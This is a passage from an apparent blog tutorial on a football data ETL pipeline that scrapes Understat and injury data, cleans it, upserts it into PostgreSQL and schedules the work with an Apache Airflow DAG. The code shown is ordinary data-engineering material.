            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decoded_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# raise error if no data is extracted
&lt;/span&gt;    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Failed to extract match data from Understat.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
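
&lt;p&gt;To see the slicing and decoding steps in isolation, here is a small sketch that runs on a made-up script string instead of the live page. The helper name &lt;code&gt;extract_embedded_json&lt;/code&gt; and the sample text are assumptions for illustration, and the real page content will differ. Unlike the function above, it starts searching from the variable name, so it would still pick the right call if a script held more than one &lt;code&gt;JSON.parse&lt;/code&gt;.&lt;/p&gt;

```python
import json


def extract_embedded_json(script_text, var_name):
    """Parse the JSON passed to the first JSON.parse('...') after var_name."""
    var_pos = script_text.find(var_name)
    if var_pos == -1:
        raise ValueError("variable not found: " + var_name)
    marker = "JSON.parse('"
    start = script_text.find(marker, var_pos)
    if start == -1:
        raise ValueError("no JSON.parse call after " + var_name)
    start += len(marker)
    end = script_text.find("')", start)
    if end == -1:
        raise ValueError("unterminated JSON.parse call for " + var_name)
    raw = script_text[start:end]
    # Turn escape sequences such as \x7B into the characters they stand for.
    decoded = raw.encode("utf8").decode("unicode_escape")
    return json.loads(decoded)


# Made-up sample: the escapes spell out {"id":"12345"}.
sample = r"var datesData = JSON.parse('\x7B\x22id\x22\x3A\x2212345\x22\x7D');"
print(extract_embedded_json(sample, "datesData"))  # {'id': '12345'}
```

&lt;p&gt;One caveat with this decoding approach: &lt;code&gt;unicode_escape&lt;/code&gt; treats the bytes as Latin-1, so raw non-ASCII characters in the source string could come out garbled and may need separate handling.&lt;/p&gt;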



&lt;h3&gt;
  
  
  Data Transformation
&lt;/h3&gt;

&lt;p&gt;With the raw data in hand, I had to clean and validate it before I could use it for analysis. The operations performed on the data included:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Name Standardization: Both team and player names are normalized to ensure consistent matching across the two data sources.&lt;/li&gt;
&lt;li&gt;Foreign Key Resolution: Player and team names are mapped to database IDs using lookup tables.&lt;/li&gt;
&lt;li&gt;Date Parsing: Various date formats are converted to the ISO standard format.&lt;/li&gt;
&lt;li&gt;Validation: Incomplete match entries are skipped.&lt;/li&gt;
&lt;/ul&gt;
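
&lt;p&gt;The name standardization and date parsing steps could be sketched roughly as follows. This is not the project's code: the alias table, the list of date formats, and the function names are all assumptions chosen for illustration.&lt;/p&gt;

```python
import unicodedata
from datetime import datetime

# Hypothetical alias table; the real mapping depends on how each source spells names.
TEAM_ALIASES = {"man utd": "manchester united", "spurs": "tottenham"}

# Hypothetical input formats, tried in order.
DATE_FORMATS = ("%Y-%m-%d %H:%M:%S", "%Y-%m-%d", "%d/%m/%Y")


def normalize_name(name, aliases=None):
    """Lower-case a name, strip accents, collapse whitespace, then apply aliases."""
    decomposed = unicodedata.normalize("NFKD", name)
    # Drop the combining marks left behind by the decomposition.
    no_accents = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    cleaned = " ".join(no_accents.lower().split())
    return (aliases or {}).get(cleaned, cleaned)


def to_iso_date(value):
    """Return YYYY-MM-DD for the first format that matches, else raise ValueError."""
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(value.strip(), fmt).date().isoformat()
        except ValueError:
            continue
    raise ValueError("unrecognised date format: " + repr(value))


print(normalize_name("Man  Utd", TEAM_ALIASES))  # manchester united
print(to_iso_date("16/08/2024"))                 # 2024-08-16
```

&lt;p&gt;Normalizing both sources through the same function before looking up IDs means a spelling difference becomes a lookup miss that can be logged, rather than a silent mismatch.&lt;/p&gt;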

&lt;p&gt;After transformation, the data was structured into two main entities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Matches – containing match ID, date, teams involved, expected goals (xG), and result.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Players and Player Stats – separating static player information from season performance data.&lt;br&gt;
Each player’s record included:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Matches and minutes played&lt;/li&gt;
&lt;li&gt;Goals and assists&lt;/li&gt;
&lt;li&gt;Expected goals (xG) and expected assists (xA)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Loading
&lt;/h3&gt;

&lt;p&gt;Transformed data was loaded into a PostgreSQL database using psycopg2.&lt;br&gt;
The schema consisted of the following tables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;player_details&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;player_stats&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;matches&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;injuries&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To ensure integrity and efficiency, I implemented:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;UPSERT operations using &lt;code&gt;ON CONFLICT&lt;/code&gt;, so that re-running the pipeline updates existing rows instead of inserting duplicates&lt;/li&gt;
&lt;li&gt;Batch inserts for efficiency&lt;/li&gt;
&lt;li&gt;Explicit transactions for commit/rollback safety&lt;/li&gt;
&lt;li&gt;Timestamp tracking for debugging and data lineage&lt;/li&gt;
&lt;/ul&gt;
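
&lt;p&gt;The upsert, batching, and transaction pattern can be tried without a database server. The sketch below deliberately swaps in Python's built-in &lt;code&gt;sqlite3&lt;/code&gt; module in place of PostgreSQL and psycopg2, and the trimmed-down &lt;code&gt;matches&lt;/code&gt; columns are assumptions, not the project's real schema. PostgreSQL accepts the same &lt;code&gt;ON CONFLICT ... DO UPDATE&lt;/code&gt; shape, although psycopg2 uses &lt;code&gt;%s&lt;/code&gt; placeholders where sqlite3 uses &lt;code&gt;?&lt;/code&gt;.&lt;/p&gt;

```python
import sqlite3

# Hypothetical, trimmed-down table; the real schema has more columns.
SCHEMA = """
CREATE TABLE IF NOT EXISTS matches (
    match_id   INTEGER PRIMARY KEY,
    match_date TEXT NOT NULL,
    home_xg    REAL,
    updated_at TEXT DEFAULT CURRENT_TIMESTAMP
)
"""

UPSERT = """
INSERT INTO matches (match_id, match_date, home_xg)
VALUES (?, ?, ?)
ON CONFLICT (match_id) DO UPDATE SET
    match_date = excluded.match_date,
    home_xg    = excluded.home_xg,
    updated_at = CURRENT_TIMESTAMP
"""


def upsert_matches(conn, rows):
    """Insert or update every row as one batch inside one transaction."""
    # 'with conn' commits on success and rolls back if an exception is raised.
    with conn:
        conn.executemany(UPSERT, rows)


conn = sqlite3.connect(":memory:")
conn.execute(SCHEMA)
upsert_matches(conn, [(1, "2024-08-16", 1.2), (2, "2024-08-17", 0.8)])
upsert_matches(conn, [(1, "2024-08-16", 1.5)])  # same key: updated, not duplicated
rows = conn.execute("SELECT match_id, home_xg FROM matches ORDER BY match_id").fetchall()
print(rows)  # [(1, 1.5), (2, 0.8)]
```

&lt;p&gt;Because the second call reuses &lt;code&gt;match_id&lt;/code&gt; 1, the table still holds two rows afterwards, which is the property that makes a daily re-run of the pipeline safe.&lt;/p&gt;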

&lt;p&gt;The database structure diagram below shows how the schema is set up.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9kvn016uiqrrca381uo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9kvn016uiqrrca381uo.png" alt="dbSchema" width="518" height="715"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Automation with Apache Airflow
&lt;/h2&gt;

&lt;p&gt;Running scripts manually became inefficient and error-prone, especially as data volumes grew.&lt;br&gt;
To automate the ETL process, I used Apache Airflow to define and schedule the workflow as a Directed Acyclic Graph (DAG).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nc"&gt;DAG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;dag_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_etl_dag&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ETL pipeline for Understat and Premier Injuries data&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;schedule&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;timedelta&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;days&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;start_date&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;catchup&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;default_args&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;default_args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tags&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;understat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ETL&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;dag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
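
&lt;p&gt;The snippet above passes a &lt;code&gt;default_args&lt;/code&gt; dictionary that is not shown. A typical definition might look like the sketch below; the keys are standard Airflow task arguments, but the values are assumptions and not taken from the project.&lt;/p&gt;

```python
from datetime import timedelta

# Assumed values for illustration; the project's real settings are not shown.
default_args = {
    "owner": "airflow",                   # label shown in the Airflow UI
    "retries": 2,                         # re-run a failed task up to twice
    "retry_delay": timedelta(minutes=5),  # wait between retry attempts
}
```

&lt;p&gt;Retries are worth setting for a scraping pipeline, since a temporary network failure or a blocked request would otherwise fail the whole daily run.&lt;/p&gt;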



&lt;p&gt;Next, I defined the tasks, wrapping each one in its own &lt;code&gt;@task()&lt;/code&gt; function. Data is passed between tasks through Airflow's XComs, which store it temporarily. I then specified the task dependencies and the workflow sequence.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;extract_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;injury_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_injury_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;matches_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_match_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;players_raw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_understat_player_stats&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_html&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;injury_html&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prettify&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches_json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;matches_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players_raw&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;players_raw&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;transform_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;

        &lt;span class="n"&gt;ti&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_db_connection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;team_name_to_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Load XComs
&lt;/span&gt;        &lt;span class="n"&gt;injury_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_html&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;matches_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches_json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players_raw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players_raw&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Transform
&lt;/span&gt;        &lt;span class="n"&gt;match_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_match_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;matches_json&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_player_stats&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;players_raw&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;injuries&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_injury_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;injury_html&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;lxml&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Push to XComs
&lt;/span&gt;        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;match_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;player_stats&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injuries&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;injuries&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;load_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_db_connection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;matches&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;player_stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;player_stats&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
